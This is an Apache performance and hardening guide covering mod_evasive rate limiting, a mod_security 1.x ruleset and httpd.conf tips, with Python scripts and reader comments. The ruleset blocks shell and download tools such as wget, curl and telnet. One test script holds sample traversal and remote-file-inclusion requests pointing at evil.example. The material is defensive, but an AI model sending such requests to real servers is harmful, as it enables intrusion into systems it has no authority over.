Apache Performance and Security Guide
This guide is written mostly for web administrators and developers who want to speed up and harden the Apache web server. Without a doubt, Apache is still one of the best web servers on the Internet. Being open source and loaded with modules that can do almost anything, Apache is a good solution for both development and production needs. This guide will help you get the most out of Apache while keeping its resource usage to a minimum.
1) Who should use this guide?
Web admins and web developers who want to optimize the speed and increase the security of the Apache web server. The guide is also useful for ISPs whose servers take heavy traffic.
2) On what operating systems has this guide been tested?
This guide was tested on Red Hat Enterprise Linux 5 and Fedora Core 8. The configuration directives apply to any platform Apache runs on, but the build commands below use apxs and assume a *nix toolchain (gcc, make).
3) Does this guide guarantee a significant increase in performance of Apache?
This guide might or might not help you increase the speed of Apache. I don't guarantee anything. Please be warned that the speed of Apache is controlled by many factors, such as the amount of RAM, processor speed, size of the executable, number of compiled modules and so on. Don't expect your Apache to be twice as fast just because you followed the guide. I will do my best to explain what I'm doing and why, so that you understand the purpose of every action and how it can help you speed up your web server.
4) What you need to get started:
The guide is useless without a working Apache installation. If you don't have Apache installed yet, go ahead and install it now. You can follow my "Apache, PHP, GD & Mod_Perl Guide" or install it on your own. I do not recommend running the default RPM version of Apache that comes with your OS distribution for various reasons. Go ahead and download the following modules into your source directory (in this case the source directory is /usr/local/src).
List of useful modules:
- mod_evasive 1.10.1 from http://www.zdziarski.com/projects/mod_evasive/
- mod_security 1.9.5 from http://www.modsecurity.org
5) Purpose of mod_evasive
This is the official description from mod_evasive's homepage: mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_dosevasive presently reports abuses via email and syslog facilities. Simply put, mod_evasive lets us detect request floods and take steps so that they do not bring the server down. When a client requests the same page, or pages on the site, faster than the configured thresholds allow (say an attacker scripting thousands of requests at once), the module puts that client's IP address on a block list and answers its requests with a 403 error for DOSBlockingPeriod seconds (10 by default). Every request that arrives from a blocked address restarts the timer, so an attacker who keeps hammering stays blocked and has to stay quiet for a full blocking period before being served again.
5.1) Installing mod_evasive
I will assume that your Apache is installed at /etc/httpd. If it is located somewhere else, please change the paths below as needed.
cd /usr/local/src
tar zxf mod_evasive.1.10.1.tar.gz
cd mod_evasive
/etc/httpd/bin/apxs -iac mod_evasive.c
(mod_evasive.c is the Apache 1.3 version; on Apache 2.x compile mod_evasive20.c from the same directory instead.)
5.2) Configuring mod_evasive
apxs -i -a -c compiles and installs the module and adds the LoadModule (and, on Apache 1.3, AddModule) lines to httpd.conf. We still have to insert the module's own configuration into the Apache configuration file. Open up httpd.conf with your favorite editor and paste the following at the end of the file:
<IfModule mod_evasive.c>
DOSHashTableSize 16384
DOSPageCount 10
DOSSiteCount 100
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 60
</IfModule>
Each directive is explained in the README in the mod_evasive source folder; in short: DOSHashTableSize is the size of the hash table each Apache child keeps for tracking clients (raise it on busy servers), DOSPageCount is the number of requests for the same URI a client may make per DOSPageInterval seconds, DOSSiteCount is the number of requests for any URI on the site per DOSSiteInterval seconds, and DOSBlockingPeriod is how long (in seconds) a client that crossed either threshold keeps receiving 403 responses. With the values above, more than 10 hits on one page or more than 100 hits on the site within a second earns a 60-second block. Two caveats: the hit tables are kept per child process and are not shared, so on a prefork server the effective thresholds are higher than the configured numbers; and mod_evasive only sees requests that have already reached Apache, so against a real DDoS it is best used as a trigger (DOSSystemCommand can run a firewall command for the offending address) rather than as the last line of defense. Use DOSWhitelist to exempt monitoring hosts and trusted proxies so they are never locked out.
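To make the thresholds above concrete, here is a small Python model of mod_evasive's decisions. It is an added example, not mod_evasive's own code: it follows the README's description of the directives used in the configuration (more than DOSPageCount requests for one URI within DOSPageInterval seconds, or more than DOSSiteCount requests for any URI within DOSSiteInterval seconds, puts the client on a block list for DOSBlockingPeriod seconds, and every request that arrives while blocked restarts that timer). The IP addresses and timings are constructed, the hit window is anchored on the previous hit as a modelling assumption, and the off-by-one details of the C implementation and its per-child tables are not reproduced.

```python
from dataclasses import dataclass, field


@dataclass
class Evasive:
    """Block-list model using the directive values from the configuration above."""
    page_count: int = 10           # DOSPageCount
    site_count: int = 100          # DOSSiteCount
    page_interval: float = 1.0     # DOSPageInterval, seconds
    site_interval: float = 1.0     # DOSSiteInterval, seconds
    blocking_period: float = 60.0  # DOSBlockingPeriod, seconds
    # (ip, uri) -> (time of last hit, hits since the window last reset)
    page_hits: dict = field(default_factory=dict)
    # ip -> (time of last hit, hits since the window last reset)
    site_hits: dict = field(default_factory=dict)
    # ip -> time the block was set or last renewed
    blocked: dict = field(default_factory=dict)

    def _hit(self, table, key, now, interval):
        """Record a hit and return the number of hits in the current window.
        The window is anchored on the previous hit: a gap of at least
        `interval` seconds resets the count (model assumption)."""
        last, hits = table.get(key, (now, 0))
        if now - last >= interval:
            hits = 0
        hits += 1
        table[key] = (now, hits)
        return hits

    def request(self, ip, uri, now):
        """Return the status Apache would send: 403 while blocked, else 200."""
        if ip in self.blocked:
            if now - self.blocked[ip] < self.blocking_period:
                self.blocked[ip] = now   # a request while blocked restarts the timer
                return 403
            del self.blocked[ip]         # the blocking period has elapsed
        on_page = self._hit(self.page_hits, (ip, uri), now, self.page_interval)
        on_site = self._hit(self.site_hits, ip, now, self.site_interval)
        if on_page > self.page_count or on_site > self.site_count:
            self.blocked[ip] = now
            return 403
        return 200


def burst(ev, ip, uri, n, start=0.0, gap=0.01):
    """Send n requests for uri from ip, `gap` seconds apart; return the statuses."""
    return [ev.request(ip, uri, start + i * gap) for i in range(n)]


def demo():
    """Constructed scenario: one client floods /index.php, another browses normally."""
    ev = Evasive()
    flood = burst(ev, "198.51.100.7", "/index.php", 12)        # 10 x 200, then 403s
    bystander = ev.request("203.0.113.9", "/index.php", 0.05)  # unaffected: 200
    retry_59s = ev.request("198.51.100.7", "/", 59.0)          # still blocked, timer restarts
    retry_118s = ev.request("198.51.100.7", "/", 118.0)        # 59 s after renewal: still 403
    retry_180s = ev.request("198.51.100.7", "/", 180.0)        # 62 s of silence: served again
    return flood, bystander, retry_59s, retry_118s, retry_180s


if __name__ == "__main__":
    print(demo())
```

The renewal rule is the part worth noticing: a blocked client that keeps retrying every few seconds never gets out, which is what you want for a script but also what happens to a legitimate user behind a busy NAT, so size DOSSiteCount for the largest shared egress you expect.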
6) Purpose of mod_security
mod_security adds intrusion detection and prevention features to the Apache web server. It has built-in functions to block various types of attacks, such as command execution, directory traversal, SQL injection and so on. Overall, mod_security is a very good way to monitor your web services, especially in shared hosting environments. Note that the directives below are the 1.x rule language; ModSecurity 2.x and later use a different language (SecRule) and will not accept them.
6.1) Installing mod_security
Again, change your Apache path if it's not /etc/httpd.
cd /usr/local/src
tar zxf modsecurity-apache_1.9.5.tar.gz
cd modsecurity-apache_1.9.5/apache1
/etc/httpd/bin/apxs -iac mod_security.c
(The tarball also contains an apache2 directory with the source for Apache 2.x.)
6.2) Configuring mod_security
The following configuration is what I would use for a web server. However, you can read the documentation and tweak mod_security to your needs; there are many things you can do with this module. One of the biggest advantages of mod_security is that it can be configured differently per virtual host: you can have one general configuration that applies to all hosts and add stricter directives to a virtual host that runs less trustworthy code. Again, paste the following at the end of httpd.conf:
<IfModule mod_security.c>
SecFilterEngine On
SecFilterDefaultAction "deny,log,status:403"
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat On
SecFilterCheckUnicodeEncoding Off
SecFilterForceByteRange 1 255
SecAuditEngine RelevantOnly
SecAuditLog logs/modsec_audit_log
SecFilterDebugLevel 0
SecFilterDebugLog logs/modsec_debug_log
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
SecFilterSelective REQUEST_METHOD "!^GET$" chain
SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"
SecFilterSelective HTTP_Transfer-Encoding "!^$"
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config\.php\?v=1&DIR"
SecFilterSelective THE_REQUEST "/\.\./\.\./"
SecFilterSelective THE_REQUEST "&highlight=%2527%252E"
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F\.php"
SecUploadDir /tmp
SecUploadKeepFiles Off
</IfModule>
The mod_security documentation explains each directive and action. The configuration above was used on a production server, but rules like these are blunt: the THE_REQUEST patterns are regular expressions, so an unescaped dot matches any character, and any request that merely contains a word such as "echo " or "wget " is denied, which can hit legitimate search queries or forum posts. Before enabling new rules on a live host, run them with SecFilterDefaultAction "log,pass", watch logs/modsec_audit_log for false positives, and only then switch the default action back to deny.
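The THE_REQUEST rules deserve a closer look because they are regular expressions, not literal strings. The following Python script is an added example (not part of mod_security or of the original page) that applies the command-word rules plus the four path-style patterns, in the unescaped trailing-space form found in widely copied versions of this ruleset, to constructed request lines, using Python's re as a stand-in for the PCRE engine mod_security uses. A tightened variant escapes the metacharacters and drops the trailing space from the path-style patterns. The script does not reproduce mod_security 1.x's own request normalization (URL decoding and so on), so it shows only what the patterns themselves match.

```python
import re

# Command-word rules from the ruleset above (the trailing space is part of each).
COMMAND_WORDS = [
    "wget ", "lynx ", "scp ", "ftp ", "cvs ", "rcp ", "curl ", "telnet ", "ssh ",
    "echo ", "links -dump ", "mkdir ", "cd /tmp ", "cd /var/tmp ",
]

# Path-style patterns in the unescaped, trailing-space form found in many
# copies of this ruleset: "." matches any character and "?" makes the
# preceding "p" optional, so they do not mean what they look like.
LOOSE_PATHS = [
    "/config.php?v=1&DIR ",
    "/../../ ",
    "&highlight=%2527%252E ",
    "changedir=%2Ftmp%2F.php ",
]

# The same intent with metacharacters escaped and the trailing space removed.
TIGHT_PATHS = [
    r"/config\.php\?v=1&DIR",
    r"/\.\./\.\./",
    r"&highlight=%2527%252E",
    r"changedir=%2Ftmp%2F\.php",
]

LOOSE_RULES = COMMAND_WORDS + LOOSE_PATHS
TIGHT_RULES = COMMAND_WORDS + TIGHT_PATHS


def first_match(request_line, rules):
    """Return the first rule whose regex matches the request line, or None.
    Mirrors SecFilterSelective THE_REQUEST, which searches anywhere in the
    "METHOD URI PROTOCOL" line."""
    for rule in rules:
        if re.search(rule, request_line):
            return rule
    return None


# Constructed request lines (not real traffic).
SAMPLES = [
    "GET /index.html HTTP/1.1",                                         # benign
    "GET /js/ui/ HTTP/1.1",                                             # benign, short path segments
    "GET /index.php?page=../../../../etc/passwd HTTP/1.1",              # directory traversal
    "GET /config.php?v=1&DIR=http://evil.example/shell.txt HTTP/1.1",   # remote file inclusion attempt
]


def compare(samples=SAMPLES):
    """Map each request line to (loose rule that fired, tightened rule that fired)."""
    return {s: (first_match(s, LOOSE_RULES), first_match(s, TIGHT_RULES))
            for s in samples}


if __name__ == "__main__":
    for line, (loose, tight) in compare().items():
        print(f"{line}\n    loose: {loose!r}\n    tight: {tight!r}")
```

Run it and the loose form denies the harmless /js/ui/ request (any path whose last two segments are two characters long matches "/../../ ") while letting the real traversal and the config.php include attempt through; the tightened form does the opposite. A shell-word rule such as "wget " fires only on a literal space, so whether an encoded payload (wget%20http://...) is caught depends on the module's normalization, which this script does not model: verify rules against the running module, not against this script alone.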
7) Apache config (httpd.conf) considerations
- Never turn "HostnameLookups" to "On" in httpd.conf. You do not want to look up every single IP that accesses your web server in your DNS.
- Do not play with the "MinSpareServers", "MaxSpareServers" and "StartServers" options unless you know what you are doing. The defaults work well for most servers.
- Those who have busy servers should decrease "KeepAliveTimeout" to 5 (the default was 15 in Apache 1.3 and 2.0; 2.2 and later default to 5). You do not want an Apache process to sit idle for 15 seconds after a request, waiting for a follow-up that may never come, when the request rate is high.
- Set "AllowOverride" to "None" everywhere possible. ISPs might not like this idea because of their users, though. If your client does not modify the .htaccess file often, set the parameters explicitly in the Apache configuration file instead. Besides saving the per-request directory checks, this stops a user (or an attacker with write access to a web directory) from changing handlers or options through .htaccess.
- Decrease the number of "DirectoryIndex" parameters. I usually set it to "index.html index.php" in my Apache configuration. Letting Apache look for every DirectoryIndex candidate in your web folder is a waste of resources.
- If you do not need to log every request on your web server, you can reduce logging. This saves disk space and write load. Either comment out the mod_log* modules or send the log to /dev/null, for example "CustomLog /dev/null common". For virtual hosts, log only the hosts that really need a full request log. Do not silence the error log, and think twice before dropping access logs on an Internet-facing host: they are the record you will need to investigate a compromise or an abuse complaint, and mod_security's audit log (above) only captures requests its rules flag.
- Set "ServerTokens" to "Prod" (and "ServerSignature Off") in your httpd.conf. This hides the module list and Apache's version from the Server header and error pages. If you check your server in Netcraft's "What's That Site Running" it will only show "Apache" instead of the detailed report. You do not want attackers to know what version of Apache and what modules you are running. Keep in mind this is obscurity only: it hides the version from casual scanners but fixes nothing, so keep patching.
- Put the following lines into your httpd.conf:
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|bin|spd|theme|module)$">
Deny from all
</FilesMatch>
<Files ~ "config\.php$">
Deny from all
</Files>
This will prevent people from downloading configuration and include files from your server. Note the escaped dot in "config\.php": the pattern is a regular expression, and the commonly seen "\config.php$" is wrong in a subtler way too, because under Apache 2's PCRE "\c" starts a control-character escape and the pattern would never match. On Apache 2.4, "Deny from all" needs mod_access_compat; the native form is "Require all denied". Better still, keep include and configuration files outside the DocumentRoot so they are never reachable over HTTP at all.
8) Other performance considerations
- Increase the amount of RAM. The more RAM, the better. You should have enough memory for Apache to keep all its children in RAM instead of in swap on the hard drive. Letting Apache swap and queue requests is not a good idea. If you have a busy site with less than 512 MB of RAM, there is a real chance that Apache will drive the machine into swap until it stops responding (it will no longer be reachable from outside). Bound Apache's memory with MaxClients: multiply the resident size of one httpd child (from ps or top) by MaxClients and keep the result below the RAM you can spare, so an overload queues connections instead of exhausting memory.
- If you have large files on your web server (such as large images, mp3 files, movies, etc.), do not let Apache serve them. Install the thttpd server and let it handle all your download requests. Use Apache only to process dynamic content.
9) Other security considerations
By default Apache is a secure server. However, many administrators weaken it by installing modules they do not need. Some administrators think "the more modules, the better, because the server will be full of features and compatible with everything", but most Apache modules are written by third-party organizations or individuals who have nothing to do with Apache development, and any one of them can be the cause of your segmentation faults and security holes. Rule of thumb while compiling Apache: the fewer the modules, the smaller the attack surface. Fewer modules also means a smaller Apache binary (if you compile modules in statically instead of loading them as DSOs), which in turn means lower memory consumption per Apache child, so the server can handle more simultaneous requests.
I recommend reading the security advisories for every module installed into Apache. One module you should always keep an eye on is mod_php. PHP is notorious for security issues that come out every once in a while. Thanks to ongoing development and a large PHP community, these issues are addressed almost immediately and a fixed version is released to the public. Make sure that you are running the latest version of PHP. I have a separate guide on compiling the latest versions of Apache with PHP right here. Carefully review the php.ini file in your PHP configuration and set everything to maximum security. You should also consider running Apache as an unprivileged user (the User and Group directives) inside a chroot. If Apache is compromised, the attacker is confined to the chroot and cannot reach the rest of the system; a chroot is not a perfect sandbox (a process that gains root inside it can escape), so it limits the damage rather than eliminating it. This is especially vital if you are running a dedicated server that you do not have physical access to.
10) Apache security/performance related links
- Apache security tips
- Apache: The Definitive Guide, 2nd Edition chapter 13 (O'Reilly)
- Apache performance notes
03/06/2005 - 11:03
I love your blog! Thanks from Turkey. You are pretty helpful and friendly.
03/18/2005 - 06:26
Thanks a lot, this guide has really helped me bring Apache up to speed :-)
10/25/2005 - 14:09
Nice and helpful blog. Thanks to you!
10/28/2005 - 17:34
Hi there, I have the following problem :(
If I run /etc/httpd/bin/apxs -iac mod_dosevasive.c
I get this error:
linux:~ # /usr/sbin/apxs2 -i -a -c mod_evasive20.c
/usr/share/apache2/build/libtool --silent --mode=compile gcc -prefer-pic -O2 -march=i586 -mcpu=i686 -fmessage-length=0 -Wall -g -fPIC -Wall -fno-strict-aliasing -D_LARGEFILE_SOURCE -DAP_HAVE_DESIGNATED_INITIALIZER -DLINUX=2 -D_REENTRANT -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -D_SVID_SOURCE -D_GNU_SOURCE -DAP_DEBUG -Wmissing-prototypes -Wstrict-prototypes -Wmissing-declarations -pthread -I/usr/include/apache2 -I/usr/include/apache2 -I/usr/include/apache2 -c -o mod_evasive20.lo mod_evasive20.c && touch mod_evasive20.slo
/usr/share/apache2/build/libtool: line 1231: gcc: command not found
apxs:Error: Command failed with rc=65536
Please help.
Thanks to all.
04/17/2006 - 14:48
Nice tips, thanks for the info.
05/02/2006 - 22:02
very useful. thanks.
03/30/2007 - 05:42
very nice tips and info, thanks.
10/06/2007 - 03:13
Nice helpful blog, very clear to understand. Thank you!